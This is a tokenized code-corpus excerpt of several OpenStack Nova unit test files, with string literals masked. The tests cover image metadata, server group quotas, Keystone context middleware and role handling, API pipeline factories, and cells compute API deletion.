"<STR_LIT:bar>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPBadRequest , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( get_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_update_item_body_uri_mismatch ( self , _get_mocked , update_mocked , <EOL> quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPBadRequest , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( quota_mocked . called ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete ( self , _get_mocked , update_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> res = self . controller . delete ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { } <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> self . assertIsNone ( res ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . delete , req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotFound ( image_id = '<STR_LIT:100>' ) ) <EOL> def test_delete_image_not_found ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> self . assertRaises ( webob . exc . HTTPNotFound , <EOL> self . controller . delete , req , '<STR_LIT:100>' , '<STR_LIT>' ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPForbidden ( explanation = '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_too_many_metadata_items_on_create ( self , _get_mocked , <EOL> update_mocked , _quota_mocked ) : <EOL> body = { "<STR_LIT>" : { "<STR_LIT:foo>" : "<STR_LIT:bar>" } } <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT:POST>' <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , req , '<STR_LIT>' , body = body ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( CHK_QUOTA_STR , <EOL> side_effect = webob . exc . HTTPForbidden ( explanation = '<STR_LIT>' ) ) <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_too_many_metadata_items_on_put ( self , _get_mocked , <EOL> update_mocked , _quota_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" , "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( self . invalid_request , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> self . assertFalse ( update_mocked . called ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_update ( self , _get_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . update , req , '<STR_LIT>' , '<STR_LIT>' , <EOL> body = body ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_update_all ( self , _get_mocked ) : <EOL> image_id = <NUM_LIT> <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' <EOL> % image_id ) <EOL> req . method = '<STR_LIT>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . update_all , req , image_id , <EOL> body = body ) <EOL> @ mock . patch ( '<STR_LIT>' , <EOL> side_effect = exception . ImageNotAuthorized ( image_id = '<STR_LIT>' ) ) <EOL> def test_image_not_authorized_create ( self , _get_mocked ) : <EOL> image_id = <NUM_LIT> <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' <EOL> % image_id ) <EOL> req . method = '<STR_LIT:POST>' <EOL> body = { "<STR_LIT>" : { "<STR_LIT>" : "<STR_LIT>" } } <EOL> req . body = jsonutils . dump_as_bytes ( body ) <EOL> req . headers [ "<STR_LIT>" ] = "<STR_LIT:application/json>" <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , req , image_id , <EOL> body = body ) <EOL> class ImageMetaDataTestV2 ( ImageMetaDataTestV21 ) : <EOL> controller_class = image_metadata . Controller <EOL> invalid_request = webob . exc . HTTPBadRequest <EOL> @ mock . patch ( '<STR_LIT>' ) <EOL> @ mock . patch ( '<STR_LIT>' , return_value = get_image_123 ( ) ) <EOL> def test_delete ( self , _get_mocked , update_mocked ) : <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> req . method = '<STR_LIT>' <EOL> res = self . controller . delete ( req , '<STR_LIT>' , '<STR_LIT>' ) <EOL> expected = copy . deepcopy ( get_image_123 ( ) ) <EOL> expected [ '<STR_LIT>' ] = { } <EOL> update_mocked . assert_called_once_with ( mock . ANY , '<STR_LIT>' , expected , <EOL> data = None , purge_props = True ) <EOL> self . assertIsNone ( res ) </s>
<s> from oslo_config import cfg <EOL> from oslo_utils import uuidutils <EOL> import webob <EOL> from nova . api . openstack . compute . legacy_v2 . contrib import server_groups <EOL> from nova . api . openstack . compute import server_groups as sg_v21 <EOL> from nova . api . openstack import extensions <EOL> from nova import context <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . api . openstack import fakes <EOL> CONF = cfg . CONF <EOL> class AttrDict ( dict ) : <EOL> def __getattr__ ( self , k ) : <EOL> return self [ k ] <EOL> def server_group_template ( ** kwargs ) : <EOL> sgroup = kwargs . copy ( ) <EOL> sgroup . setdefault ( '<STR_LIT:name>' , '<STR_LIT:test>' ) <EOL> return sgroup <EOL> def server_group_db ( sg ) : <EOL> attrs = sg . copy ( ) <EOL> if '<STR_LIT:id>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT:id>' ) <EOL> if '<STR_LIT>' in attrs : <EOL> policies = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = policies <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> members = attrs . pop ( '<STR_LIT>' ) <EOL> attrs [ '<STR_LIT>' ] = members <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = [ ] <EOL> if '<STR_LIT>' in attrs : <EOL> attrs [ '<STR_LIT>' ] = attrs . pop ( '<STR_LIT>' ) <EOL> else : <EOL> attrs [ '<STR_LIT>' ] = { } <EOL> attrs [ '<STR_LIT>' ] = <NUM_LIT:0> <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> attrs [ '<STR_LIT>' ] = None <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in attrs : <EOL> attrs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> attrs [ '<STR_LIT:id>' ] = <NUM_LIT:7> <EOL> return AttrDict ( attrs ) <EOL> class ServerGroupQuotasTestV21 ( test . TestCase ) : <EOL> def setUp ( self ) : <EOL> super ( ServerGroupQuotasTestV21 , self ) . setUp ( ) <EOL> self . _setup_controller ( ) <EOL> self . req = fakes . HTTPRequest . blank ( '<STR_LIT>' ) <EOL> def _setup_controller ( self ) : <EOL> self . controller = sg_v21 . ServerGroupController ( ) <EOL> def _setup_quotas ( self ) : <EOL> pass <EOL> def _assert_server_groups_in_use ( self , project_id , user_id , in_use ) : <EOL> ctxt = context . get_admin_context ( ) <EOL> result = quota . QUOTAS . get_user_quotas ( ctxt , project_id , user_id ) <EOL> self . assertEqual ( result [ '<STR_LIT>' ] [ '<STR_LIT>' ] , in_use ) <EOL> def test_create_server_group_normal ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res_dict = self . controller . create ( self . req , <EOL> body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:name>' ] , '<STR_LIT:test>' ) <EOL> self . assertTrue ( uuidutils . is_uuid_like ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] ) ) <EOL> self . assertEqual ( res_dict [ '<STR_LIT>' ] [ '<STR_LIT>' ] , policies ) <EOL> def test_create_server_group_quota_limit ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> for i in range ( CONF . quota_server_groups ) : <EOL> self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> self . assertRaises ( webob . exc . HTTPForbidden , <EOL> self . controller . create , <EOL> self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> def test_delete_server_group_by_admin ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sgroup = server_group_template ( ) <EOL> policies = [ '<STR_LIT>' ] <EOL> sgroup [ '<STR_LIT>' ] = policies <EOL> res = self . controller . create ( self . req , body = { '<STR_LIT>' : sgroup } ) <EOL> sg_id = res [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] <EOL> context = self . req . environ [ '<STR_LIT>' ] <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:1> ) <EOL> req = fakes . HTTPRequest . blank ( '<STR_LIT>' , use_admin_context = True ) <EOL> self . controller . delete ( req , sg_id ) <EOL> self . _assert_server_groups_in_use ( context . project_id , <EOL> context . user_id , <NUM_LIT:0> ) <EOL> def test_delete_server_group_by_id ( self ) : <EOL> self . _setup_quotas ( ) <EOL> sg = server_group_template ( id = '<STR_LIT>' ) <EOL> self . called = False <EOL> def server_group_delete ( context , id ) : <EOL> self . called = True <EOL> def return_server_group ( context , group_id ) : <EOL> self . assertEqual ( sg [ '<STR_LIT:id>' ] , group_id ) <EOL> return server_group_db ( sg ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> server_group_delete ) <EOL> self . stub_out ( '<STR_LIT>' , <EOL> return_server_group ) <EOL> resp = self . controller . delete ( self . req , '<STR_LIT>' ) <EOL> self . assertTrue ( self . called ) <EOL> if isinstance ( self . controller , sg_v21 . ServerGroupController ) : <EOL> status_int = self . controller . delete . wsgi_code <EOL> else : <EOL> status_int = resp . status_int <EOL> self . assertEqual ( <NUM_LIT> , status_int ) <EOL> class ServerGroupQuotasTestV2 ( ServerGroupQuotasTestV21 ) : <EOL> def _setup_controller ( self ) : <EOL> self . ext_mgr = self . mox . CreateMock ( extensions . ExtensionManager ) <EOL> self . controller = server_groups . ServerGroupController ( self . ext_mgr ) <EOL> def _setup_quotas ( self ) : <EOL> self . ext_mgr . is_loaded ( '<STR_LIT>' ) . MultipleTimes ( ) . AndReturn ( True ) <EOL> self . mox . ReplayAll ( ) </s>
<s> from oslo_config import cfg <EOL> from oslo_middleware import request_id <EOL> from oslo_serialization import jsonutils <EOL> import webob <EOL> import webob . exc <EOL> import nova . api . auth <EOL> from nova import test <EOL> CONF = cfg . CONF <EOL> class TestNovaKeystoneContextMiddleware ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestNovaKeystoneContextMiddleware , self ) . setUp ( ) <EOL> @ webob . dec . wsgify ( ) <EOL> def fake_app ( req ) : <EOL> self . context = req . environ [ '<STR_LIT>' ] <EOL> return webob . Response ( ) <EOL> self . context = None <EOL> self . middleware = nova . api . auth . NovaKeystoneContext ( fake_app ) <EOL> self . request = webob . Request . blank ( '<STR_LIT:/>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = jsonutils . dumps ( { } ) <EOL> def test_no_user_or_user_id ( self ) : <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_user_id_only ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_user_only ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_user_id_trumps_user ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> self . assertEqual ( self . context . user_id , '<STR_LIT>' ) <EOL> def test_invalid_service_catalog ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = "<STR_LIT>" <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_request_id_extracted_from_env ( self ) : <EOL> req_id = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . environ [ request_id . ENV_REQUEST_ID ] = req_id <EOL> self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( req_id , self . context . request_id ) <EOL> class TestKeystoneMiddlewareRoles ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestKeystoneMiddlewareRoles , self ) . setUp ( ) <EOL> @ webob . dec . wsgify ( ) <EOL> def role_check_app ( req ) : <EOL> context = req . environ [ '<STR_LIT>' ] <EOL> if "<STR_LIT>" in context . roles and "<STR_LIT>" not in context . roles : <EOL> return webob . Response ( status = "<STR_LIT>" ) <EOL> elif context . roles == [ '<STR_LIT>' ] : <EOL> return webob . Response ( status = "<STR_LIT>" ) <EOL> else : <EOL> raise webob . exc . HTTPBadRequest ( "<STR_LIT>" ) <EOL> self . middleware = nova . api . auth . NovaKeystoneContext ( role_check_app ) <EOL> self . request = webob . Request . blank ( '<STR_LIT:/>' ) <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> self . request . headers [ '<STR_LIT>' ] = jsonutils . dumps ( { } ) <EOL> self . roles = "<STR_LIT>" <EOL> def test_roles ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_roles_empty ( self ) : <EOL> self . request . headers [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> def test_no_role_headers ( self ) : <EOL> response = self . request . get_response ( self . middleware ) <EOL> self . assertEqual ( response . status , '<STR_LIT>' ) <EOL> class TestPipeLineFactory ( test . NoDBTestCase ) : <EOL> class FakeFilter ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> self . obj = None <EOL> def __call__ ( self , obj ) : <EOL> self . obj = obj <EOL> return self <EOL> class FakeApp ( object ) : <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> class FakeLoader ( object ) : <EOL> def get_filter ( self , name ) : <EOL> return TestPipeLineFactory . FakeFilter ( name ) <EOL> def get_app ( self , name ) : <EOL> return TestPipeLineFactory . FakeApp ( name ) <EOL> def _test_pipeline ( self , pipeline , app ) : <EOL> for p in pipeline . split ( ) [ : - <NUM_LIT:1> ] : <EOL> self . assertEqual ( app . name , p ) <EOL> self . assertIsInstance ( app , TestPipeLineFactory . FakeFilter ) <EOL> app = app . obj <EOL> self . assertEqual ( app . name , pipeline . split ( ) [ - <NUM_LIT:1> ] ) <EOL> self . assertIsInstance ( app , TestPipeLineFactory . FakeApp ) <EOL> def test_pipeline_factory ( self ) : <EOL> fake_pipeline = '<STR_LIT>' <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , noauth2 = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_v21 ( self ) : <EOL> fake_pipeline = '<STR_LIT>' <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> app = nova . api . auth . pipeline_factory_v21 ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , noauth2 = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_with_rate_limits ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , True ) <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , keystone = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) <EOL> def test_pipeline_factory_without_rate_limits ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline1 = '<STR_LIT>' <EOL> fake_pipeline2 = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , <EOL> keystone_nolimit = fake_pipeline1 , <EOL> keystone = fake_pipeline2 ) <EOL> self . _test_pipeline ( fake_pipeline1 , app ) <EOL> def test_pipeline_factory_missing_nolimits_pipeline ( self ) : <EOL> CONF . set_override ( '<STR_LIT>' , False ) <EOL> CONF . set_override ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> fake_pipeline = '<STR_LIT>' <EOL> app = nova . api . auth . pipeline_factory ( <EOL> TestPipeLineFactory . FakeLoader ( ) , None , keystone = fake_pipeline ) <EOL> self . _test_pipeline ( fake_pipeline , app ) </s>
<s> """<STR_LIT>""" <EOL> import functools <EOL> import inspect <EOL> import mock <EOL> from mox3 import mox <EOL> from oslo_utils import timeutils <EOL> from nova import block_device <EOL> from nova . cells import manager <EOL> from nova . compute import api as compute_api <EOL> from nova . compute import cells_api as compute_cells_api <EOL> from nova . compute import flavors <EOL> from nova . compute import utils as compute_utils <EOL> from nova . compute import vm_states <EOL> import nova . conf <EOL> from nova import context <EOL> from nova import db <EOL> from nova import exception <EOL> from nova import objects <EOL> from nova import quota <EOL> from nova import test <EOL> from nova . tests . unit . compute import test_compute <EOL> from nova . tests . unit import fake_instance <EOL> from nova . tests . unit . objects import test_flavor <EOL> from nova . tests import uuidsentinel as uuids <EOL> ORIG_COMPUTE_API = None <EOL> CONF = nova . conf . CONF <EOL> def stub_call_to_cells ( context , instance , method , * args , ** kwargs ) : <EOL> fn = getattr ( ORIG_COMPUTE_API , method ) <EOL> original_instance = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if original_instance : <EOL> instance = original_instance <EOL> db . instance_update ( context , instance [ '<STR_LIT>' ] , <EOL> dict ( vm_state = instance [ '<STR_LIT>' ] , <EOL> task_state = instance [ '<STR_LIT>' ] ) ) <EOL> saved_quotas = quota . QUOTAS <EOL> quota . QUOTAS = quota . QuotaEngine ( <EOL> quota_driver_class = quota . NoopQuotaDriver ( ) ) <EOL> compute_api . QUOTAS = quota . QUOTAS <EOL> try : <EOL> return fn ( context , instance , * args , ** kwargs ) <EOL> finally : <EOL> quota . QUOTAS = saved_quotas <EOL> compute_api . QUOTAS = saved_quotas <EOL> def stub_cast_to_cells ( context , instance , method , * args , ** kwargs ) : <EOL> fn = getattr ( ORIG_COMPUTE_API , method ) <EOL> original_instance = kwargs . pop ( '<STR_LIT>' , None ) <EOL> if original_instance : <EOL> instance = original_instance <EOL> db . instance_update ( context , instance [ '<STR_LIT>' ] , <EOL> dict ( vm_state = instance [ '<STR_LIT>' ] , <EOL> task_state = instance [ '<STR_LIT>' ] ) ) <EOL> saved_quotas = quota . QUOTAS <EOL> quota . QUOTAS = quota . QuotaEngine ( <EOL> quota_driver_class = quota . NoopQuotaDriver ( ) ) <EOL> compute_api . QUOTAS = quota . QUOTAS <EOL> try : <EOL> fn ( context , instance , * args , ** kwargs ) <EOL> finally : <EOL> quota . QUOTAS = saved_quotas <EOL> compute_api . QUOTAS = saved_quotas <EOL> def deploy_stubs ( stubs , api , original_instance = None ) : <EOL> call = stub_call_to_cells <EOL> cast = stub_cast_to_cells <EOL> if original_instance : <EOL> kwargs = dict ( original_instance = original_instance ) <EOL> call = functools . partial ( stub_call_to_cells , ** kwargs ) <EOL> cast = functools . partial ( stub_cast_to_cells , ** kwargs ) <EOL> stubs . Set ( api , '<STR_LIT>' , call ) <EOL> stubs . Set ( api , '<STR_LIT>' , cast ) <EOL> class CellsComputeAPITestCase ( test_compute . ComputeAPITestCase ) : <EOL> def setUp ( self ) : <EOL> super ( CellsComputeAPITestCase , self ) . setUp ( ) <EOL> global ORIG_COMPUTE_API <EOL> ORIG_COMPUTE_API = self . compute_api <EOL> self . flags ( enable = True , group = '<STR_LIT>' ) <EOL> def _fake_validate_cell ( * args , ** kwargs ) : <EOL> return <EOL> self . compute_api = compute_cells_api . ComputeCellsAPI ( ) <EOL> self . stubs . Set ( self . compute_api , '<STR_LIT>' , <EOL> _fake_validate_cell ) <EOL> deploy_stubs ( self . stubs , self . compute_api ) <EOL> def tearDown ( self ) : <EOL> global ORIG_COMPUTE_API <EOL> self . compute_api = ORIG_COMPUTE_API <EOL> super ( CellsComputeAPITestCase , self ) . tearDown ( ) <EOL> def test_instance_metadata ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def test_evacuate ( self ) : <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> def _test ( mock_evacuate ) : <EOL> instance = objects . Instance ( uuid = uuids . evacuate_instance , <EOL> cell_name = '<STR_LIT>' ) <EOL> dest_host = '<STR_LIT>' <EOL> self . compute_api . evacuate ( self . context , instance , host = dest_host ) <EOL> mock_evacuate . assert_called_once_with ( <EOL> self . context , instance , '<STR_LIT>' ) <EOL> _test ( ) <EOL> def test_error_evacuate ( self ) : <EOL> self . skipTest ( "<STR_LIT>" ) <EOL> def _test_delete_instance_no_cell ( self , method_name ) : <EOL> cells_rpcapi = self . compute_api . cells_rpcapi <EOL> self . mox . StubOutWithMock ( cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> self . mox . StubOutWithMock ( compute_api . API , '<STR_LIT>' ) <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> delete_type = method_name == '<STR_LIT>' and '<STR_LIT>' or '<STR_LIT>' <EOL> cells_rpcapi . instance_delete_everywhere ( self . context , <EOL> inst , delete_type ) <EOL> compute_api . API . _local_delete ( self . context , inst , <EOL> mox . IsA ( objects . BlockDeviceMappingList ) , <EOL> method_name , mox . IgnoreArg ( ) ) <EOL> self . mox . ReplayAll ( ) <EOL> self . stubs . Set ( self . compute_api . network_api , '<STR_LIT>' , <EOL> lambda * a , ** kw : None ) <EOL> getattr ( self . compute_api , method_name ) ( self . context , inst ) <EOL> def test_delete_instance_no_cell_constraint_failure_does_not_loop ( self ) : <EOL> with mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = None <EOL> inst . destroy = mock . MagicMock ( ) <EOL> inst . destroy . side_effect = exception . ObjectActionError ( action = '<STR_LIT>' , <EOL> reason = '<STR_LIT>' ) <EOL> inst . refresh = mock . MagicMock ( ) <EOL> self . assertRaises ( exception . ObjectActionError , <EOL> self . compute_api . delete , self . context , inst ) <EOL> inst . destroy . assert_called_once_with ( ) <EOL> def test_delete_instance_no_cell_constraint_failure_corrects_itself ( self ) : <EOL> def add_cell_name ( context , instance , delete_type ) : <EOL> instance . cell_name = '<STR_LIT>' <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' , side_effect = add_cell_name ) <EOL> def _test ( mock_delete_everywhere , mock_compute_delete ) : <EOL> inst = self . _create_fake_instance_obj ( ) <EOL> inst . cell_name = None <EOL> inst . destroy = mock . MagicMock ( ) <EOL> inst . destroy . side_effect = exception . ObjectActionError ( action = '<STR_LIT>' , <EOL> reason = '<STR_LIT>' ) <EOL> inst . refresh = mock . MagicMock ( ) <EOL> self . compute_api . delete ( self . context , inst ) <EOL> inst . destroy . assert_called_once_with ( ) <EOL> mock_compute_delete . assert_called_once_with ( self . context , inst ) <EOL> _test ( ) <EOL> def test_delete_instance_no_cell_destroy_fails_already_deleted ( self ) : <EOL> instance = objects . Instance ( uuid = uuids . destroy_instance , <EOL> cell_name = None ) <EOL> actionerror = exception . ObjectActionError ( action = '<STR_LIT>' , reason = '<STR_LIT>' ) <EOL> notfound = exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' , <EOL> side_effect = actionerror ) <EOL> @ mock . patch . object ( instance , '<STR_LIT>' , side_effect = notfound ) <EOL> def _test ( mock_refresh , mock_local_delete , mock_delete_everywhere , <EOL> mock_compute_delete ) : <EOL> self . compute_api . delete ( self . context , instance ) <EOL> mock_delete_everywhere . assert_called_once_with ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> mock_local_delete . assert_called_once_with ( self . context , <EOL> instance , mock . ANY , '<STR_LIT>' , self . compute_api . _do_delete ) <EOL> mock_refresh . assert_called_once_with ( ) <EOL> self . assertFalse ( mock_compute_delete . called ) <EOL> _test ( ) <EOL> def test_delete_instance_no_cell_instance_not_found_already_deleted ( self ) : <EOL> instance = objects . Instance ( uuid = uuids . delete_instance , cell_name = None ) <EOL> notfound = exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' ) <EOL> @ mock . patch . object ( self . compute_api . cells_rpcapi , <EOL> '<STR_LIT>' ) <EOL> @ mock . patch . object ( compute_api . API , '<STR_LIT>' , <EOL> side_effect = notfound ) <EOL> def _test ( mock_local_delete , mock_delete_everywhere , <EOL> mock_compute_delete ) : <EOL> self . compute_api . delete ( self . context , instance ) <EOL> mock_delete_everywhere . assert_called_once_with ( self . context , <EOL> instance , '<STR_LIT>' ) <EOL> mock_local_delete . assert_called_once_with ( self . context , <EOL> instance , mock . ANY , '<STR_LIT>' , self . compute_api . _do_delete ) <EOL> self . assertFalse ( mock_compute_delete . called ) <EOL> _test ( ) <EOL> def test_soft_delete_instance_no_cell ( self ) : <EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_delete_instance_no_cell ( self ) : <EOL> self . _test_delete_instance_no_cell ( '<STR_LIT>' ) <EOL> def test_force_delete_instance_no_cell ( self ) : 